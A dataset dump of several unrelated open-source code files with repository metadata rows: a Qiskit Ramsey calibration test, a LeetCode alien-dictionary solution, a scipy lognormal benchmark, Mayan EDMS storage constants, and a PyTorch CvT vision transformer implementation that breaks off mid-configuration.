class TestRamseyXY(QiskitTestCase):
"""Tests for the Ramsey XY experiment."""
def setUp(self):
"""Initialize some cals."""
super().setUp()
library = FixedFrequencyTransmon()
self.cals = BackendCalibrations(FakeArmonk(), library)
def test_end_to_end(self):
"""Test that we can run on a mock backend and perform a fit.
This test also checks that we can pickup frequency shifts with different signs.
"""
test_tol = 0.01
ramsey = RamseyXY(0)
for freq_shift in [2e6, -3e6]:
test_data = ramsey.run(MockRamseyXY(freq_shift=freq_shift)).block_for_results()
meas_shift = test_data.analysis_results(1).value.value
self.assertTrue((meas_shift - freq_shift) < abs(test_tol * freq_shift))
def test_update_calibrations(self):
"""Test that the calibration version of the experiment updates the cals."""
tol = 1e4 # 10 kHz resolution
# Check qubit frequency before running the cal
f01 = self.cals.get_parameter_value("qubit_lo_freq", 0)
self.assertTrue(len(self.cals.parameters_table(parameters=["qubit_lo_freq"])["data"]), 1)
self.assertEqual(f01, FakeArmonk().defaults().qubit_freq_est[0])
freq_shift = 4e6
osc_shift = 2e6
backend = MockRamseyXY(freq_shift=freq_shift + osc_shift) # oscillation with 6 MHz
FrequencyCal(0, self.cals, backend, osc_freq=osc_shift).run().block_for_results()
# Check that qubit frequency after running the cal is shifted by freq_shift, i.e. 4 MHz.
f01 = self.cals.get_parameter_value("qubit_lo_freq", 0)
self.assertTrue(len(self.cals.parameters_table(parameters=["qubit_lo_freq"])["data"]), 2)
self.assertTrue(abs(f01 - (freq_shift + FakeArmonk().defaults().qubit_freq_est[0])) < tol)
def test_experiment_config(self):
"""Test converting to and from config works"""
exp = RamseyXY(0)
config = exp.config
loaded_exp = RamseyXY.from_config(config)
self.assertNotEqual(exp, loaded_exp)
self.assertEqual(config, loaded_exp.config)
exp = FrequencyCal(0, self.cals)
config = exp.config
loaded_exp = FrequencyCal.from_config(config)
self.assertNotEqual(exp, loaded_exp)
self.assertEqual(config, loaded_exp.config)
| 40.085366 | 98 | 0.706115 |
ace9457ae3646732df90d57402bd200b6842a5e1 | 3,787 | py | Python | cs15211/VerifyinganAlienDictionary.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | 1 | 2021-07-05T01:53:30.000Z | 2021-07-05T01:53:30.000Z | cs15211/VerifyinganAlienDictionary.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | null | null | null | cs15211/VerifyinganAlienDictionary.py | JulyKikuAkita/PythonPrac | 0ba027d9b8bc7c80bc89ce2da3543ce7a49a403c | [
"Apache-2.0"
] | 1 | 2018-01-08T07:14:08.000Z | 2018-01-08T07:14:08.000Z | # coding=utf-8
__source__ = 'https://leetcode.com/problems/verifying-an-alien-dictionary/'
# Time: O(N)
# Space: O(1)
#
# Description: Leetcode # 953. Verifying an Alien Dictionary
#
# In an alien language, surprisingly they also use english lowercase letters,
# but possibly in a different order.
# The order of the alphabet is some permutation of lowercase letters.
#
# Given a sequence of words written in the alien language, and the order of the alphabet,
# return true if and only if the given words are sorted lexicographicaly in this alien language.
#
# Example 1:
#
# Input: words = ["hello","leetcode"], order = "hlabcdefgijkmnopqrstuvwxyz"
# Output: true
# Explanation: As 'h' comes before 'l' in this language, then the sequence is sorted.
# Example 2:
#
# Input: words = ["word","world","row"], order = "worldabcefghijkmnpqstuvxyz"
# Output: false
# Explanation: As 'd' comes after 'l' in this language, then words[0] > words[1],
# hence the sequence is unsorted.
# Example 3:
#
# Input: words = ["apple","app"], order = "abcdefghijklmnopqrstuvwxyz"
# Output: false
# Explanation: The first three characters "app" match,
# and the second string is shorter (in size.)
# According to lexicographical rules "apple" > "app",
# because 'l' > '∅', where '∅' is defined as the blank character
# which is less than any other character (More info).
#
#
# Note:
#
# 1 <= words.length <= 100
# 1 <= words[i].length <= 20
# order.length == 26
# All characters in words[i] and order are english lowercase letters.
#
import unittest
# 28ms 100%
class Solution(object):
def isAlienSorted(self, words, order):
"""
:type words: List[str]
:type order: str
:rtype: bool
"""
order_index = {c: i for i, c in enumerate(order)}
for i in xrange(len(words) - 1):
word1 = words[i]
word2 = words[i+1]
# Find the first difference word1[k] != word2[k].
for k in xrange(min(len(word1), len(word2))):
# If they compare badly, it's not sorted.
if word1[k] != word2[k]:
if order_index[word1[k]] > order_index[word2[k]]:
return False
break
else:
# If we didn't find a first difference, the
# words are like ("app", "apple").
if len(word1) > len(word2):
return False
return True
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/verifying-an-alien-dictionary/solution/
Approach 1: Check Adjacent Words
Complexity Analysis
Time Complexity: O(C), where C is the total content of words.
Space Complexity: O(1)
# 4ms 100%
class Solution {
public boolean isAlienSorted(String[] words, String order) {
int[] map = new int[26];
for (int i = 0; i < 26; i++) {
map[order.charAt(i) - 'a'] = i;
}
if (words == null || words.length <= 1) return true;
for (int i = 1; i < words.length; i++) {
if (comp(words[i - 1], words[i], map)) { // true if words[i-1] > words[i]
return false;
}
}
return true;
}
private boolean comp(String a, String b, int[] map) {
int alen = a.length(), blen = b.length(), minlen = Math.min(alen, blen);
char[] as = a.toCharArray(), bs = b.toCharArray();
for (int i = 0; i < minlen; i++) {
if (map[as[i] - 'a'] < map[bs[i] - 'a']) return false;
else if (map[as[i] - 'a'] == map[bs[i] - 'a']) continue;
else return true;
}
return alen > blen;
}
}
''' | 32.367521 | 96 | 0.589913 |
ace94678baa7439075cf0b27e393b38ad9b60eee | 5,018 | py | Python | lib/node_modules/@stdlib/stats/base/dists/lognormal/ctor/benchmark/python/benchmark.scipy.py | ghalimi/stdlib | 88f50b88aa945875ef053e2f89d26f9150a18c12 | [
"BSL-1.0"
] | 3,428 | 2016-07-14T13:48:46.000Z | 2022-03-31T22:32:13.000Z | lib/node_modules/@stdlib/stats/base/dists/lognormal/ctor/benchmark/python/benchmark.scipy.py | ghalimi/stdlib | 88f50b88aa945875ef053e2f89d26f9150a18c12 | [
"BSL-1.0"
] | 435 | 2016-04-07T18:12:45.000Z | 2022-03-22T15:43:17.000Z | lib/node_modules/@stdlib/stats/base/dists/lognormal/ctor/benchmark/python/benchmark.scipy.py | sthagen/stdlib | 042b6215818db0e2a784e72c7e054167dcefcd2a | [
"BSL-1.0"
] | 188 | 2016-11-29T22:58:11.000Z | 2022-03-17T06:46:43.000Z | #!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark scipy.stats.lognorm."""
from __future__ import print_function
import timeit
REPEATS = 3
COUNT = [0] # use a list to allow modification within nested scopes
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(iterations, elapsed):
"""Print benchmark results.
# Arguments
* `iterations`: number of iterations
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(1000000, 0.131009101868)
```
"""
rate = iterations / elapsed
print(" ---")
print(" iterations: " + str(iterations))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark(name, setup, stmt, iterations):
"""Run the benchmark and print benchmark results.
# Arguments
* `name`: benchmark name
* `setup`: benchmark setup
* `stmt`: statement to benchmark
* `iterations`: number of iterations
# Examples
``` python
python> benchmark("random", "from random import random;", "y = random()", 1000000)
```
"""
t = timeit.Timer(stmt, setup=setup)
print_version()
i = 0
while i < REPEATS:
print("# python::" + name)
COUNT[0] += 1
elapsed = t.timeit(number=iterations)
print_results(iterations, elapsed)
print("ok " + str(COUNT[0]) + " benchmark finished")
i += 1
def main():
"""Run the benchmarks."""
name = "lognorm:entropy"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.entropy()"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:kurtosis"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.stats(moments='k')"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:mean"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.mean()"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:median"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.median()"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:skewness"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.stats(moments='s')"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:stdev"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.std()"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:variance"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.var()"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:cdf"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.cdf(random())"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:logpdf"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.logpdf(random())"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:pdf"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.pdf(random())"
iterations = 1000
benchmark(name, setup, stmt, iterations)
name = "lognorm:quantile"
setup = "from scipy.stats import lognorm; from random import random; rv = lognorm(1.0, 2.3);"
stmt = "y = rv.ppf(random())"
iterations = 1000
benchmark(name, setup, stmt, iterations)
print_summary(COUNT[0], COUNT[0])
if __name__ == "__main__":
main()
| 28.511364 | 97 | 0.635711 |
ace9468d751bb7af1c3ee649ad895952086d82f8 | 187 | py | Python | mayan/apps/storage/backends/literals.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 343 | 2015-01-05T14:19:35.000Z | 2018-12-10T19:07:48.000Z | mayan/apps/storage/backends/literals.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 191 | 2015-01-03T00:48:19.000Z | 2018-11-30T09:10:25.000Z | mayan/apps/storage/backends/literals.py | nattangwiwat/Mayan-EDMS-recitation | fcf16afb56eae812fb99144d65ae1ae6749de0b7 | [
"Apache-2.0"
] | 257 | 2019-05-14T10:26:37.000Z | 2022-03-30T03:37:36.000Z | ENCRYPTION_FILE_CHUNK_SIZE = 64 * 1024 # 64K
ENCRYPTION_KEY_DERIVATION_ITERATIONS = 100000
ENCRYPTION_KEY_SIZE = 32
ZIP_CHUNK_SIZE = 64 * 1024 # 64K
ZIP_MEMBER_FILENAME = 'mayan_file'
| 26.714286 | 45 | 0.802139 |
ace9490b45336c762711aeea73d03d21914908a9 | 31,161 | py | Python | timmextension/models/cvt.py | okotaku/timmextension | 0fde1e848ddfbb632fbebefd98fdb3171cb0733b | [
"Apache-2.0"
] | null | null | null | timmextension/models/cvt.py | okotaku/timmextension | 0fde1e848ddfbb632fbebefd98fdb3171cb0733b | [
"Apache-2.0"
] | null | null | null | timmextension/models/cvt.py | okotaku/timmextension | 0fde1e848ddfbb632fbebefd98fdb3171cb0733b | [
"Apache-2.0"
] | null | null | null | # --------------------------------------------------------
# Model from official source: https://github.com/microsoft/CvT
# --------------------------------------------------------
import collections.abc as container_abcs
import logging
import os
from collections import OrderedDict
from functools import partial
from itertools import repeat
import numpy as np
import scipy
import torch
import torch.nn as nn
import torch.nn.functional as F
from einops import rearrange
from einops.layers.torch import Rearrange
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD
from timm.models.helpers import build_model_with_cfg
from timm.models.layers import DropPath, trunc_normal_
from timm.models.registry import register_model
def _cfg(url='', **kwargs):
return {
'url': url,
'num_classes': 1000,
'input_size': (3, 224, 224),
'pool_size': None,
'crop_pct': None,
'interpolation': None,
'mean': IMAGENET_DEFAULT_MEAN,
'std': IMAGENET_DEFAULT_STD,
'classifier': 'head',
**kwargs
}
default_cfgs = {
'cvt_13_224':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-13-224x224-IN-1k.pth' # noqa
),
'cvt_13_384':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-13-384x384-IN-1k.pth' # noqa
),
'cvt_13_384_22k':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-13-384x384-IN-22k.pth' # noqa
),
'cvt_21_224':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-21-224x224-IN-1k.pth' # noqa
),
'cvt_21_384':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-21-384x384-IN-1k.pth' # noqa
),
'cvt_21_384_22k':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/CvT-21-384x384-IN-22k.pth' # noqa
),
'cvt_w24':
_cfg(
url=
'https://github.com/okotaku/timmextension/releases/download/w_cvt/vip_s7.pth' # noqa
),
}
# From PyTorch internals
def _ntuple(n):
def parse(x):
if isinstance(x, container_abcs.Iterable):
return x
return tuple(repeat(x, n))
return parse
to_1tuple = _ntuple(1)
to_2tuple = _ntuple(2)
to_3tuple = _ntuple(3)
to_4tuple = _ntuple(4)
to_ntuple = _ntuple
class LayerNorm(nn.LayerNorm):
"""Subclass torch's LayerNorm to handle fp16."""
def forward(self, x: torch.Tensor):
orig_type = x.dtype
ret = super().forward(x.type(torch.float32))
return ret.type(orig_type)
class QuickGELU(nn.Module):
def forward(self, x: torch.Tensor):
return x * torch.sigmoid(1.702 * x)
class Mlp(nn.Module):
def __init__(self,
in_features,
hidden_features=None,
out_features=None,
act_layer=nn.GELU,
drop=0.):
super().__init__()
out_features = out_features or in_features
hidden_features = hidden_features or in_features
self.fc1 = nn.Linear(in_features, hidden_features)
self.act = act_layer()
self.fc2 = nn.Linear(hidden_features, out_features)
self.drop = nn.Dropout(drop)
def forward(self, x):
x = self.fc1(x)
x = self.act(x)
x = self.drop(x)
x = self.fc2(x)
x = self.drop(x)
return x
class Attention(nn.Module):
def __init__(self,
dim_in,
dim_out,
num_heads,
qkv_bias=False,
attn_drop=0.,
proj_drop=0.,
method='dw_bn',
kernel_size=3,
stride_kv=1,
stride_q=1,
padding_kv=1,
padding_q=1,
with_cls_token=True,
**kwargs):
super().__init__()
self.stride_kv = stride_kv
self.stride_q = stride_q
self.dim = dim_out
self.num_heads = num_heads
# head_dim = self.qkv_dim // num_heads
self.scale = dim_out**-0.5
self.with_cls_token = with_cls_token
self.conv_proj_q = self._build_projection(
dim_in, dim_out, kernel_size, padding_q, stride_q,
'linear' if method == 'avg' else method)
self.conv_proj_k = self._build_projection(dim_in, dim_out, kernel_size,
padding_kv, stride_kv,
method)
self.conv_proj_v = self._build_projection(dim_in, dim_out, kernel_size,
padding_kv, stride_kv,
method)
self.proj_q = nn.Linear(dim_in, dim_out, bias=qkv_bias)
self.proj_k = nn.Linear(dim_in, dim_out, bias=qkv_bias)
self.proj_v = nn.Linear(dim_in, dim_out, bias=qkv_bias)
self.attn_drop = nn.Dropout(attn_drop)
self.proj = nn.Linear(dim_out, dim_out)
self.proj_drop = nn.Dropout(proj_drop)
def _build_projection(self, dim_in, dim_out, kernel_size, padding, stride,
method):
if method == 'dw_bn':
proj = nn.Sequential(
OrderedDict([
('conv',
nn.Conv2d(dim_in,
dim_in,
kernel_size=kernel_size,
padding=padding,
stride=stride,
bias=False,
groups=dim_in)),
('bn', nn.BatchNorm2d(dim_in)),
('rearrage', Rearrange('b c h w -> b (h w) c')),
]))
elif method == 'avg':
proj = nn.Sequential(
OrderedDict([
('avg',
nn.AvgPool2d(kernel_size=kernel_size,
padding=padding,
stride=stride,
ceil_mode=True)),
('rearrage', Rearrange('b c h w -> b (h w) c')),
]))
elif method == 'linear':
proj = None
else:
raise ValueError('Unknown method ({})'.format(method))
return proj
def forward_conv(self, x, h, w):
if self.with_cls_token:
cls_token, x = torch.split(x, [1, h * w], 1)
x = rearrange(x, 'b (h w) c -> b c h w', h=h, w=w)
if self.conv_proj_q is not None:
q = self.conv_proj_q(x)
else:
q = rearrange(x, 'b c h w -> b (h w) c')
if self.conv_proj_k is not None:
k = self.conv_proj_k(x)
else:
k = rearrange(x, 'b c h w -> b (h w) c')
if self.conv_proj_v is not None:
v = self.conv_proj_v(x)
else:
v = rearrange(x, 'b c h w -> b (h w) c')
if self.with_cls_token:
q = torch.cat((cls_token, q), dim=1)
k = torch.cat((cls_token, k), dim=1)
v = torch.cat((cls_token, v), dim=1)
return q, k, v
def forward(self, x, h, w):
if (self.conv_proj_q is not None) or (self.conv_proj_k
is not None) or (self.conv_proj_v
is not None):
q, k, v = self.forward_conv(x, h, w)
q = rearrange(self.proj_q(q), 'b t (h d) -> b h t d', h=self.num_heads)
k = rearrange(self.proj_k(k), 'b t (h d) -> b h t d', h=self.num_heads)
v = rearrange(self.proj_v(v), 'b t (h d) -> b h t d', h=self.num_heads)
attn_score = torch.einsum('bhlk,bhtk->bhlt', [q, k]) * self.scale
attn = F.softmax(attn_score, dim=-1)
attn = self.attn_drop(attn)
x = torch.einsum('bhlt,bhtv->bhlv', [attn, v])
x = rearrange(x, 'b h t d -> b t (h d)')
x = self.proj(x)
x = self.proj_drop(x)
return x
@staticmethod
def compute_macs(module, input, output):
# T: num_token
# S: num_token
input = input[0]
flops = 0
_, T, C = input.shape
H = int(np.sqrt(T - 1)) if module.with_cls_token else int(np.sqrt(T))
W = H
H_Q = H / module.stride_q
W_Q = H / module.stride_q
T_Q = H_Q * W_Q + 1 if module.with_cls_token else H_Q * W_Q
H_KV = H / module.stride_kv
W_KV = W / module.stride_kv
T_KV = H_KV * W_KV + 1 if module.with_cls_token else H_KV * W_KV
# C = module.dim
# S = T
# Scaled-dot-product macs
# [B x T x C] x [B x C x T] --> [B x T x S]
# multiplication-addition is counted as 1 because
# operations can be fused
flops += T_Q * T_KV * module.dim
# [B x T x S] x [B x S x C] --> [B x T x C]
flops += T_Q * module.dim * T_KV
if hasattr(module, 'conv_proj_q') and hasattr(module.conv_proj_q,
'conv'):
params = sum(
[p.numel() for p in module.conv_proj_q.conv.parameters()])
flops += params * H_Q * W_Q
if hasattr(module, 'conv_proj_k') and hasattr(module.conv_proj_k,
'conv'):
params = sum(
[p.numel() for p in module.conv_proj_k.conv.parameters()])
flops += params * H_KV * W_KV
if hasattr(module, 'conv_proj_v') and hasattr(module.conv_proj_v,
'conv'):
params = sum(
[p.numel() for p in module.conv_proj_v.conv.parameters()])
flops += params * H_KV * W_KV
params = sum([p.numel() for p in module.proj_q.parameters()])
flops += params * T_Q
params = sum([p.numel() for p in module.proj_k.parameters()])
flops += params * T_KV
params = sum([p.numel() for p in module.proj_v.parameters()])
flops += params * T_KV
params = sum([p.numel() for p in module.proj.parameters()])
flops += params * T
module.__flops__ += flops
class Block(nn.Module):
def __init__(self,
dim_in,
dim_out,
num_heads,
mlp_ratio=4.,
qkv_bias=False,
drop=0.,
attn_drop=0.,
drop_path=0.,
act_layer=nn.GELU,
norm_layer=nn.LayerNorm,
**kwargs):
super().__init__()
self.with_cls_token = kwargs['with_cls_token']
self.norm1 = norm_layer(dim_in)
self.attn = Attention(dim_in, dim_out, num_heads, qkv_bias, attn_drop,
drop, **kwargs)
self.drop_path = DropPath(drop_path) \
if drop_path > 0. else nn.Identity()
self.norm2 = norm_layer(dim_out)
dim_mlp_hidden = int(dim_out * mlp_ratio)
self.mlp = Mlp(in_features=dim_out,
hidden_features=dim_mlp_hidden,
act_layer=act_layer,
drop=drop)
def forward(self, x, h, w):
res = x
x = self.norm1(x)
attn = self.attn(x, h, w)
x = res + self.drop_path(attn)
x = x + self.drop_path(self.mlp(self.norm2(x)))
return x
class ConvEmbed(nn.Module):
"""Image to Conv Embedding."""
def __init__(self,
patch_size=7,
in_chans=3,
embed_dim=64,
stride=4,
padding=2,
norm_layer=None):
super().__init__()
patch_size = to_2tuple(patch_size)
self.patch_size = patch_size
self.proj = nn.Conv2d(in_chans,
embed_dim,
kernel_size=patch_size,
stride=stride,
padding=padding)
self.norm = norm_layer(embed_dim) if norm_layer else None
def forward(self, x):
x = self.proj(x)
B, C, H, W = x.shape
x = rearrange(x, 'b c h w -> b (h w) c')
if self.norm:
x = self.norm(x)
x = rearrange(x, 'b (h w) c -> b c h w', h=H, w=W)
return x
class VisionTransformer(nn.Module):
"""Vision Transformer with support for patch or hybrid CNN input stage."""
def __init__(self,
patch_size=16,
patch_stride=16,
patch_padding=0,
in_chans=3,
embed_dim=768,
depth=12,
num_heads=12,
mlp_ratio=4.,
qkv_bias=False,
drop_rate=0.,
attn_drop_rate=0.,
drop_path_rate=0.,
act_layer=nn.GELU,
norm_layer=nn.LayerNorm,
init='trunc_norm',
**kwargs):
super().__init__()
self.num_features = self.embed_dim = embed_dim
self.rearrage = None
self.patch_embed = ConvEmbed(
# img_size=img_size,
patch_size=patch_size,
in_chans=in_chans,
stride=patch_stride,
padding=patch_padding,
embed_dim=embed_dim,
norm_layer=norm_layer)
with_cls_token = kwargs['with_cls_token']
if with_cls_token:
self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
else:
self.cls_token = None
self.pos_drop = nn.Dropout(p=drop_rate)
dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)]
blocks = []
for j in range(depth):
blocks.append(
Block(dim_in=embed_dim,
dim_out=embed_dim,
num_heads=num_heads,
mlp_ratio=mlp_ratio,
qkv_bias=qkv_bias,
drop=drop_rate,
attn_drop=attn_drop_rate,
drop_path=dpr[j],
act_layer=act_layer,
norm_layer=norm_layer,
**kwargs))
self.blocks = nn.ModuleList(blocks)
if self.cls_token is not None:
trunc_normal_(self.cls_token, std=.02)
if init == 'xavier':
self.apply(self._init_weights_xavier)
else:
self.apply(self._init_weights_trunc_normal)
def _init_weights_trunc_normal(self, m):
if isinstance(m, nn.Linear):
logging.info('=> init weight of Linear from trunc norm')
trunc_normal_(m.weight, std=0.02)
if m.bias is not None:
logging.info('=> init bias of Linear to zeros')
nn.init.constant_(m.bias, 0)
elif isinstance(m, (nn.LayerNorm, nn.BatchNorm2d)):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
def _init_weights_xavier(self, m):
if isinstance(m, nn.Linear):
logging.info('=> init weight of Linear from xavier uniform')
nn.init.xavier_uniform_(m.weight)
if m.bias is not None:
logging.info('=> init bias of Linear to zeros')
nn.init.constant_(m.bias, 0)
elif isinstance(m, (nn.LayerNorm, nn.BatchNorm2d)):
nn.init.constant_(m.bias, 0)
nn.init.constant_(m.weight, 1.0)
def forward(self, x):
x = self.patch_embed(x)
B, C, H, W = x.size()
x = rearrange(x, 'b c h w -> b (h w) c')
cls_tokens = None
if self.cls_token is not None:
# stole cls_tokens impl from Phil Wang, thanks
cls_tokens = self.cls_token.expand(B, -1, -1)
x = torch.cat((cls_tokens, x), dim=1)
x = self.pos_drop(x)
for i, blk in enumerate(self.blocks):
x = blk(x, H, W)
if self.cls_token is not None:
cls_tokens, x = torch.split(x, [1, H * W], 1)
x = rearrange(x, 'b (h w) c -> b c h w', h=H, w=W)
return x, cls_tokens
class CvT(nn.Module):
"""https://github.com/microsoft/CvT."""
def __init__(self,
in_chans=3,
num_classes=1000,
act_layer=nn.GELU,
norm_layer=nn.LayerNorm,
init='trunc_norm',
spec=None):
super().__init__()
self.num_classes = num_classes
self.num_stages = spec['NUM_STAGES']
for i in range(self.num_stages):
kwargs = {
'patch_size': spec['PATCH_SIZE'][i],
'patch_stride': spec['PATCH_STRIDE'][i],
'patch_padding': spec['PATCH_PADDING'][i],
'embed_dim': spec['DIM_EMBED'][i],
'depth': spec['DEPTH'][i],
'num_heads': spec['NUM_HEADS'][i],
'mlp_ratio': spec['MLP_RATIO'][i],
'qkv_bias': spec['QKV_BIAS'][i],
'drop_rate': spec['DROP_RATE'][i],
'attn_drop_rate': spec['ATTN_DROP_RATE'][i],
'drop_path_rate': spec['DROP_PATH_RATE'][i],
'with_cls_token': spec['CLS_TOKEN'][i],
'method': spec['QKV_PROJ_METHOD'][i],
'kernel_size': spec['KERNEL_QKV'][i],
'padding_q': spec['PADDING_Q'][i],
'padding_kv': spec['PADDING_KV'][i],
'stride_kv': spec['STRIDE_KV'][i],
'stride_q': spec['STRIDE_Q'][i],
}
stage = VisionTransformer(in_chans=in_chans,
init=init,
act_layer=act_layer,
norm_layer=norm_layer,
**kwargs)
setattr(self, f'stage{i}', stage)
in_chans = spec['DIM_EMBED'][i]
self.num_features = spec['DIM_EMBED'][-1]
self.norm = norm_layer(self.num_features)
self.cls_token = spec['CLS_TOKEN'][-1]
# Classifier head
self.head = nn.Linear(
self.num_features,
num_classes) if num_classes > 0 else nn.Identity()
trunc_normal_(self.head.weight, std=0.02)
def init_weights(self, pretrained='', pretrained_layers=[], verbose=True):
if os.path.isfile(pretrained):
pretrained_dict = torch.load(pretrained, map_location='cpu')
logging.info(f'=> loading pretrained model {pretrained}')
model_dict = self.state_dict()
pretrained_dict = {
k: v
for k, v in pretrained_dict.items() if k in model_dict.keys()
}
need_init_state_dict = {}
for k, v in pretrained_dict.items():
need_init = (k.split('.')[0] in pretrained_layers
or pretrained_layers[0] is '*') # noqa
if need_init:
if verbose:
logging.info(f'=> init {k} from {pretrained}')
if 'pos_embed' in k and v.size() != model_dict[k].size():
size_pretrained = v.size()
size_new = model_dict[k].size()
logging.info(
'=> load_pretrained: resized variant: {} to {}'.
format(size_pretrained, size_new))
ntok_new = size_new[1]
ntok_new -= 1
posemb_tok, posemb_grid = v[:, :1], v[0, 1:]
gs_old = int(np.sqrt(len(posemb_grid)))
gs_new = int(np.sqrt(ntok_new))
logging.info(
'=> load_pretrained: grid-size from {} to {}'.
format(gs_old, gs_new))
posemb_grid = posemb_grid.reshape(gs_old, gs_old, -1)
zoom = (gs_new / gs_old, gs_new / gs_old, 1)
posemb_grid = scipy.ndimage.zoom(posemb_grid,
zoom,
order=1)
posemb_grid = posemb_grid.reshape(1, gs_new**2, -1)
v = torch.tensor(
np.concatenate([posemb_tok, posemb_grid], axis=1))
need_init_state_dict[k] = v
self.load_state_dict(need_init_state_dict, strict=False)
@torch.jit.ignore
def no_weight_decay(self):
layers = set()
for i in range(self.num_stages):
layers.add(f'stage{i}.pos_embed')
layers.add(f'stage{i}.cls_token')
return layers
def reset_classifier(self, num_classes):
if num_classes > 0:
self.head = nn.Linear(self.num_features, num_classes)
else:
self.head = nn.Identity()
def forward_features(self, x):
for i in range(self.num_stages):
x, cls_tokens = getattr(self, f'stage{i}')(x)
if self.cls_token:
x_out = self.norm(cls_tokens)
x_out = torch.squeeze(x_out, dim=1)
else:
x_out = rearrange(x, 'b c h w -> b (h w) c')
x_out = self.norm(x_out)
x_out = torch.mean(x_out, dim=1)
return x_out
def forward(self, x):
x = self.forward_features(x)
x = self.head(x)
return x
def _create_cvt(variant, pretrained, **kwargs):
return build_model_with_cfg(CvT,
variant,
pretrained,
default_cfg=default_cfgs[variant],
**kwargs)
@register_model
def cvt_13_224(num_classes=1000, pretrained=False, **kwargs):
msvit_spec = {
'INIT': 'trunc_norm',
'NUM_STAGES': 3,
'PATCH_SIZE': [7, 3, 3],
'PATCH_STRIDE': [4, 2, 2],
'PATCH_PADDING': [2, 1, 1],
'DIM_EMBED': [64, 192, 384],
'NUM_HEADS': [1, 3, 6],
'DEPTH': [1, 2, 10],
'MLP_RATIO': [4.0, 4.0, 4.0],
'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
'DROP_RATE': [0.0, 0.0, 0.0],
'DROP_PATH_RATE': [0.0, 0.0, 0.1],
'QKV_BIAS': [True, True, True],
'CLS_TOKEN': [False, False, True],
'POS_EMBED': [False, False, False],
'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
'KERNEL_QKV': [3, 3, 3],
'PADDING_KV': [1, 1, 1],
'STRIDE_KV': [2, 2, 2],
'PADDING_Q': [1, 1, 1],
'STRIDE_Q': [1, 1, 1],
}
msvit_spec.update(kwargs)
msvit = _create_cvt('cvt_13_224',
pretrained,
in_chans=3,
num_classes=num_classes,
act_layer=QuickGELU,
norm_layer=partial(LayerNorm, eps=1e-5),
init=getattr(msvit_spec, 'INIT', 'trunc_norm'),
spec=msvit_spec)
return msvit
@register_model
def cvt_13_384(num_classes=1000, pretrained=False, **kwargs):
msvit_spec = {
'INIT': 'trunc_norm',
'NUM_STAGES': 3,
'PATCH_SIZE': [7, 3, 3],
'PATCH_STRIDE': [4, 2, 2],
'PATCH_PADDING': [2, 1, 1],
'DIM_EMBED': [64, 192, 384],
'NUM_HEADS': [1, 3, 6],
'DEPTH': [1, 2, 10],
'MLP_RATIO': [4.0, 4.0, 4.0],
'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
